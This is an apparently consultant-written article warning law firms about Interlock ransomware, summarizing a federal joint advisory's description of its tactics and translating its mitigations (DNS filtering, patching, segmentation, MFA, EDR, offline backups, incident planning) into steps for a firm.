When was the last time you asked yourself: what happens if all of our case files, contracts, client records, and internal systems suddenly go dark, locked by invisible hands?
It may sound like a nightmare scenario for big corporations, but the truth is, ransomware is now squarely targeting smaller organizations with fewer defenses. That includes law firms.
In July 2025, CISA, the FBI, HHS, and MS‑ISAC issued a joint advisory (AA25‑203A) to warn about a fast‑escalating threat: Interlock ransomware.
Though it only first appeared publicly in September 2024, Interlock has already demonstrated advanced tactics, especially in how it infiltrates, exfiltrates, and holds data ransom.
Here’s what your firm needs to know and do.
What makes Interlock different and dangerous
1. Double extortion and delayed ransom demands
Interlock doesn’t simply encrypt your files. It first steals data, creating pressure with the threat of public exposure. That “double extortion” approach is already a mainstay among ransomware gangs.
But Interlock has a twist: victims often don’t see a ransom note or payment instructions until they reach out to the attackers. This gives attackers negotiating leverage and keeps defenders in the dark about how to respond immediately.
2. Cross‑platform targeting
Interlock operates on both Windows and Linux systems. It has also been observed encrypting virtual machines across both environments. That means hybrid or virtualized infrastructures aren’t safe by default.
3. Unusual initial access methods
Phishing and exposed RDP are common vectors for ransomware. However, Interlock has shown more creative techniques.
These include:
- Drive-by downloads from compromised (but legitimate) websites, disguising payloads as browser or security tool updates
- A social engineering tactic dubbed ClickFix, in which a victim is tricked into executing a malicious payload under the guise of “fixing” a problem, such as a fake CAPTCHA prompt or update
- Use of tools like AzCopy or Azure Storage Explorer for data exfiltration, and methods like lateral movement using credential harvesting tools (Lumma Stealer, Berserk Stealer) and remote access toolkits (Cobalt Strike, AnyDesk)
Because of these sophisticated behaviors, a ransomware breach may be underway for days or weeks before anyone notices.
Why your firm is squarely in the crosshairs
Ransomware operators increasingly focus on opportunity rather than just large public companies. They know smaller organizations and professional firms often have thinner security budgets, yet they hold high-value client data.
If your firm’s systems go dark, you risk:
- Losing access to client files and disrupting operations
- Exposure of privileged, confidential data
- Reputational fallout with clients, bar associations, or regulators
- Recovery costs, legal liabilities, or noncompliance with data privacy obligations
In short, you can’t treat ransomware as “someone else’s problem.” It is now a firmwide risk.
How to defend today and stay ahead
The federal advisory (AA25‑203A) offers mitigation recommendations. Below, I translate them into actionable tactics for a law firm.
1. Harden your “front door” (initial access protection)
- Use DNS filtering or protective DNS to block known malicious domains before connections resolve
- Deploy web access firewalls and block access to high-risk sites
- Train your staff on spotting social engineering like fake updates or unexpected prompts
2. Patch everything fast
Make sure all operating systems, firmware, and software (including backup systems) are up to date. Vulnerabilities are often the path ransomware exploits.
3. Segment and isolate your environment
Don’t let one compromised node become your entire network. Use segmentation or zero trust design so that lateral moves are harder to execute.
4. Enable multi‑factor authentication (MFA)
Every critical access point, such as remote desktops, admin consoles, and VPNs, should require a second factor beyond a password.
5. Deploy robust detection tools and monitor behavior
- Use Endpoint Detection and Response (EDR) tools that can spot unusual activity, such as odd PowerShell commands or data exfiltration
- Apply Sigma rules or detection logic for Interlock TTPs, which are included in the joint advisory
- Monitor DNS query logs and alert on anomalous traffic that may signal command and control attempts
6. Back up and validate your backups
Store backups offline or air-gapped. Test your restores regularly. Backups are your last line of defense if encryption succeeds.
7. Plan your incident response in advance
Don’t wait until encryption hits. Know your response chain, who to call, how to isolate, and how you’ll notify clients or regulators. Practice drills regularly.
Thinking ahead: resilience over reaction
This isn’t just about countering Interlock. The advisory is a warning that ransomware tactics are evolving faster than ever. Many of the recommendations above, including zero trust, behavioral detection, and segmentation, are foundational defenses that will protect you from the next strain as well.
If your firm waits until a crisis, the damage is more than financial. The trust of your clients, the integrity of your records, and your professional reputation all hang in the balance.
Let’s not wait. Let’s act decisively.
If you’d like help auditing your law firm’s readiness, building detection rules, or implementing a secure architecture, just say the word.